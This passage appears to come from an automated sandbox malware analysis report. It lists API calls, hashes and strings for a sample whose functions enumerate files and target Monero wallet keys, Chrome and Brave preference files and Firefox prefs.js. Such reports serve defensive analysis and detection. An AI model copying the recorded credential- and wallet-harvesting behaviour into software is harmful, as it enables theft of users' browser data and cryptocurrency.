                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$AllocCurrentExitNumaVirtual
                              • String ID:
                              • API String ID: 1103761159-0
                              • Opcode ID: 7e4ddbc9d7485411253c82c00c03b2ecab72a934f8fd49988cca621b80898392
                              • Instruction ID: 97b28d0d4651b60d653c6bdf258d976a830955214d4fa9fcaa8aabc9e5e18714
                              • Opcode Fuzzy Hash: 7e4ddbc9d7485411253c82c00c03b2ecab72a934f8fd49988cca621b80898392
                              • Instruction Fuzzy Hash: 3EE0E67094534CFBE7206BA0EC0EB1D7678AF04B11F104155F709B71C4D6B526409799
                              Function 00FF10A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                              Download Yara Rule
                              APIs
                              • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00FF10B3
                              • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00FF10F7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Virtual$AllocFree
                              • String ID:
                              • API String ID: 2087232378-0
                              • Opcode ID: 8ce154d0520cf518203f497f7a7440c3f33d639bee43a05f8e2f988510c093c5
                              • Instruction ID: 96843f2df78184c9bf798675cf84cd25949a063d8099b428566c626083d6d9a6
                              • Opcode Fuzzy Hash: 8ce154d0520cf518203f497f7a7440c3f33d639bee43a05f8e2f988510c093c5
                              • Instruction Fuzzy Hash: CFF0E271A41208BBE7149AA8AC49FBEB7E8EB05B25F300858F644E3280D5719E00DBA0
                              Function 00FF1190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 010078E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 01007910
                                • Part of subcall function 010078E0: RtlAllocateHeap.NTDLL(00000000), ref: 01007917
                                • Part of subcall function 010078E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0100792F
                                • Part of subcall function 01007850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00FF11B7), ref: 01007880
                                • Part of subcall function 01007850: RtlAllocateHeap.NTDLL(00000000), ref: 01007887
                                • Part of subcall function 01007850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0100789F
                              • ExitProcess.KERNEL32 ref: 00FF11C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Process$AllocateName$ComputerExitUser
                              • String ID:
                              • API String ID: 3550813701-0
                              • Opcode ID: 492d305c61fb3e3f3ee1501e244a74e31a2dfbea1b1a11fdd1524e206dadd264
                              • Instruction ID: dea045d9457159047499d63cb58712cc40283460114ada59487d56b6c6a83cfd
                              • Opcode Fuzzy Hash: 492d305c61fb3e3f3ee1501e244a74e31a2dfbea1b1a11fdd1524e206dadd264
                              • Instruction Fuzzy Hash: 6EE012B5D5030657EA1173B0BC09BAA329C6B25245F140434FA85D3581FA29FA009765

                              Non-executed Functions

                              Function 010038B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 010038CC
                              • FindFirstFileA.KERNEL32(?,?), ref: 010038E3
                              • lstrcat.KERNEL32(?,?), ref: 01003935
                              • StrCmpCA.SHLWAPI(?,01010F70), ref: 01003947
                              • StrCmpCA.SHLWAPI(?,01010F74), ref: 0100395D
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 01003C67
                              • FindClose.KERNEL32(000000FF), ref: 01003C7C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                              • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                              • API String ID: 1125553467-2524465048
                              • Opcode ID: 0bcaba4711a65c2ba9c7c8078ae86db1464b4aa81942999587f1b6544e1caef7
                              • Instruction ID: 865b0d9273384744c9a4aabc7e369dbe5f9dc0e806c851d5714a07b7c3f52a41
                              • Opcode Fuzzy Hash: 0bcaba4711a65c2ba9c7c8078ae86db1464b4aa81942999587f1b6544e1caef7
                              • Instruction Fuzzy Hash: 3BA13071A002099FDB35DB64DC89FEE7378BB58300F04459CA68D9B185EB759B84CF61
                              Function 00FFBE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0100A740: lstrcpy.KERNEL32(01010E17,00000000), ref: 0100A788
                                • Part of subcall function 0100A920: lstrcpy.KERNEL32(00000000,?), ref: 0100A972
                                • Part of subcall function 0100A920: lstrcat.KERNEL32(00000000), ref: 0100A982
                                • Part of subcall function 0100A9B0: lstrlen.KERNEL32(?,01988C20,?,\Monero\wallet.keys,01010E17), ref: 0100A9C5
                                • Part of subcall function 0100A9B0: lstrcpy.KERNEL32(00000000), ref: 0100AA04
                                • Part of subcall function 0100A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0100AA12
                                • Part of subcall function 0100A8A0: lstrcpy.KERNEL32(?,01010E17), ref: 0100A905
                              • FindFirstFileA.KERNEL32(00000000,?,01010B32,01010B2B,00000000,?,?,?,010113F4,01010B2A), ref: 00FFBEF5
                              • StrCmpCA.SHLWAPI(?,010113F8), ref: 00FFBF4D
                              • StrCmpCA.SHLWAPI(?,010113FC), ref: 00FFBF63
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00FFC7BF
                              • FindClose.KERNEL32(000000FF), ref: 00FFC7D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                              • API String ID: 3334442632-726946144
                              • Opcode ID: 8a1313ae208cc03a5d4c621b50d8a7807947976a5d5f0a042a931b49502bfc6c
                              • Instruction ID: b986b683a9889833d809e8fa65ef46fa06c0675df4758e96f6153639bd372c9c
                              • Opcode Fuzzy Hash: 8a1313ae208cc03a5d4c621b50d8a7807947976a5d5f0a042a931b49502bfc6c
                              • Instruction Fuzzy Hash: A6425472A10209EBEB15FB70DD95EED733CAFA4300F408568A54A971D4EF349B49CBA1
                              Function 01004910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 0100492C
                              • FindFirstFileA.KERNEL32(?,?), ref: 01004943
                              • StrCmpCA.SHLWAPI(?,01010FDC), ref: 01004971
                              • StrCmpCA.SHLWAPI(?,01010FE0), ref: 01004987
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 01004B7D
                              • FindClose.KERNEL32(000000FF), ref: 01004B92
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s$%s\%s$%s\*
                              • API String ID: 180737720-445461498
                              • Opcode ID: fc9c9f28eba5a79f4cd28ad091f198be6027ec1bd250b3b2c44949805b7ff68d
                              • Instruction ID: a19e0117c5a6467e6c5291f9cc7de5a48653dd43449e89503b45514b8b9ecf96
                              • Opcode Fuzzy Hash: fc9c9f28eba5a79f4cd28ad091f198be6027ec1bd250b3b2c44949805b7ff68d
                              • Instruction Fuzzy Hash: D26188B1900219ABDB25EBA4EC49FEA737CBB48700F04459CB689D7044EB75D785CF90
                              Function 01004570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 01004580
                              • RtlAllocateHeap.NTDLL(00000000), ref: 01004587
                              • wsprintfA.USER32 ref: 010045A6
                              • FindFirstFileA.KERNEL32(?,?), ref: 010045BD
                              • StrCmpCA.SHLWAPI(?,01010FC4), ref: 010045EB
                              • StrCmpCA.SHLWAPI(?,01010FC8), ref: 01004601
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0100468B
                              • FindClose.KERNEL32(000000FF), ref: 010046A0
                              • lstrcat.KERNEL32(?,0198FAD8), ref: 010046C5
                              • lstrcat.KERNEL32(?,0198E250), ref: 010046D8
                              • lstrlen.KERNEL32(?), ref: 010046E5
                              • lstrlen.KERNEL32(?), ref: 010046F6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                              • String ID: %s\%s$%s\*
                              • API String ID: 671575355-2848263008
                              • Opcode ID: c0ae920899d1db42bd13edfbe319d40ca01cdf077c71b6881c879d814ae02af0
                              • Instruction ID: 568e2c971a3a6accc242b22a0d5ee11f140a36f3f6ff3cba7ab551bdc67da353
                              • Opcode Fuzzy Hash: c0ae920899d1db42bd13edfbe319d40ca01cdf077c71b6881c879d814ae02af0
                              • Instruction Fuzzy Hash: 4C5162B1900218ABDB65EB70EC8DFED737CBB58300F404598E68AD7084EB759B848F91
                              Function 01003EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 01003EC3
                              • FindFirstFileA.KERNEL32(?,?), ref: 01003EDA
                              • StrCmpCA.SHLWAPI(?,01010FAC), ref: 01003F08
                              • StrCmpCA.SHLWAPI(?,01010FB0), ref: 01003F1E
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0100406C
                              • FindClose.KERNEL32(000000FF), ref: 01004081
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s
                              • API String ID: 180737720-4073750446
                              • Opcode ID: 336a7438243b6f5847df180327c971a076038f3535799bf3452cd06f81c4603a
                              • Instruction ID: 8b77e3c4e4cf9e723aa7d6fcdee63cf3077d2334bb0b1ddd00e01e38f3733ddc
                              • Opcode Fuzzy Hash: 336a7438243b6f5847df180327c971a076038f3535799bf3452cd06f81c4603a
                              • Instruction Fuzzy Hash: E85167B1900218ABDB25EBB4DC89EEA737CBB54300F04859CB699D7084DB75D7858F50
                              Function 00FFED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 00FFED3E
                              • FindFirstFileA.KERNEL32(?,?), ref: 00FFED55
                              • StrCmpCA.SHLWAPI(?,01011538), ref: 00FFEDAB
                              • StrCmpCA.SHLWAPI(?,0101153C), ref: 00FFEDC1
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00FFF2AE
                              • FindClose.KERNEL32(000000FF), ref: 00FFF2C3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\*.*
                              • API String ID: 180737720-1013718255
                              • Opcode ID: 33fb9afe60cee01da021e0ac4212bd2da15942df4e19d7cec8e6d0fd305ec17f
                              • Instruction ID: 0b031d417a133ed215ea3c26ed939dbb1970c5d0095409387083189c3a7eca4f
                              • Opcode Fuzzy Hash: 33fb9afe60cee01da021e0ac4212bd2da15942df4e19d7cec8e6d0fd305ec17f
                              • Instruction Fuzzy Hash: 11E1D272A11219DAFB56FB60DC55EEE7338AF64200F4041A9A54B670D1EF306F8ACF51
                              Function 00FFF6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0100A740: lstrcpy.KERNEL32(01010E17,00000000), ref: 0100A788
                                • Part of subcall function 0100A920: lstrcpy.KERNEL32(00000000,?), ref: 0100A972
                                • Part of subcall function 0100A920: lstrcat.KERNEL32(00000000), ref: 0100A982
                                • Part of subcall function 0100A9B0: lstrlen.KERNEL32(?,01988C20,?,\Monero\wallet.keys,01010E17), ref: 0100A9C5
                                • Part of subcall function 0100A9B0: lstrcpy.KERNEL32(00000000), ref: 0100AA04
                                • Part of subcall function 0100A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0100AA12
                                • Part of subcall function 0100A8A0: lstrcpy.KERNEL32(?,01010E17), ref: 0100A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,010115B8,01010D96), ref: 00FFF71E
                              • StrCmpCA.SHLWAPI(?,010115BC), ref: 00FFF76F
                              • StrCmpCA.SHLWAPI(?,010115C0), ref: 00FFF785
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00FFFAB1
                              • FindClose.KERNEL32(000000FF), ref: 00FFFAC3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: prefs.js
                              • API String ID: 3334442632-3783873740
                              • Opcode ID: 1ab98a440018910aaf0ce50f53da212e13bde049524091c66002804fd23eee99
                              • Instruction ID: f51c021c4a73e40c23303aeb57e936cf04f791b52331c2525a653885b5f3cec0
                              • Opcode Fuzzy Hash: 1ab98a440018910aaf0ce50f53da212e13bde049524091c66002804fd23eee99
                              • Instruction Fuzzy Hash: A3B13371A00209DBEB25FF60DC95FEE7379AF64300F4085A8958A97194EF346B49CF91
                              Function 00FF16D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0100A740: lstrcpy.KERNEL32(01010E17,00000000), ref: 0100A788
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0101510C,?,?,?,010151B4,?,?,00000000,?,00000000), ref: 00FF1923
                              • StrCmpCA.SHLWAPI(?,0101525C), ref: 00FF1973
                              • StrCmpCA.SHLWAPI(?,01015304), ref: 00FF1989
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00FF1D40
                              • DeleteFileA.KERNEL32(00000000), ref: 00FF1DCA
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00FF1E20
                              • FindClose.KERNEL32(000000FF), ref: 00FF1E32
                                • Part of subcall function 0100A920: lstrcpy.KERNEL32(00000000,?), ref: 0100A972
                                • Part of subcall function 0100A920: lstrcat.KERNEL32(00000000), ref: 0100A982
